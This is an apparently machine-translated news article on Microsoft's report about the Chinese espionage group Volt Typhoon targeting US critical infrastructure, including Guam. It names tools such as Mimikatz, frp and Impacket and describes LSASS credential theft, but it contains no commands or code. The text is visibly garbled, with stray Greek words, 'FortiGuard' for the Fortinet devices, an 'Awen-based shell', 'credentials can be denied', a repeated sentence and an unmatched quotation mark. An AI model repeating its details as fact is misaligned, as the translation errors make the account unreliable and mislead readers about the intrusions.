According to Microsoft, the Chinese team espionageThe cyber threat it's tracking, dubbed Volt Typhoon, is targeting critical infrastructure organizations across the US, including Guam, at least through mid-2021.
Its victims include a wide range of critical sectors such as government, shipping, telecommunications, manufacturing, IT, utilities, transportation, construction and education.
The first attack vector is to compromise Fortinet FortiGuard devices exposed to the internet by exploiting an unknown 0day vulnerability.
Once the target's network is compromised, they can use hands-on activities with it keyboard and PowerShell, Certutil, Netsh, Windows Management Instrumentation Command Line (WMIC), etc. Live off-the-land binaries (LOLBin) to launch what Microsoft describes as “living off-the-land” attacks.
However, according to a joint advisory released today by the FBI, NSA, CISA and the Australian, New Zealand, UK and Canadian cyber security agencies, they have identified Fast Reverse Proxy (frp), the tool theftς διαπιστευτηρίων Mimikatz, the Impacket network and frameworks, and other open source tools have also been observed.
Volt Typhoon combines malicious activity with legitimate network traffic to avoid detection, such as ASUS, Cisco, D-Link, Netgear, FatPipe and Zyxel routers, firewalls and Appliances VPN in hacked small offices and home office (SOHO).
Using the privileged access gained after a Fortinet device is compromised, govt hacker credentials can be denied through the Local Security Authority Subsystem Service (LSASS).
Stolen credentials allow them to deploy one websites Awen-based shell to extract and preserve data on the compromised system.
As Mandiant Intelligence chief analyst John Hultquist said, these intrusions into US critical infrastructure organizations are a concerted effort to give China the advantage in the event of a future conflict between the two countries. It appears to be part of a concerted effort to give access to China in the event of a future conflict between the two countries.
"There are many reasons for targeting critical infrastructure, but an unrelenting focus on these areas may indicate preparations for disruptive or destructive cyber attacks," said Hultquist.
States conduct long-term incursions into critical infrastructure to prepare for potential conflicts. Similar intrusions extraordinary of necessity are regularly carried out by the states.
Over the past decade, Russia has targeted several critical infrastructure sites in operations that would not be considered rapid launch operations. China has similarly targeted the oil and gas sector in the past. While these operations are aggressive and potentially dangerous, they do not necessarily indicate that an attack is imminent."
Microsoft said it followed its normal procedures and proactively contacted all customers targeted or compromised in these attacks, providing them with the information they needed to protect their networks from future breach attempts.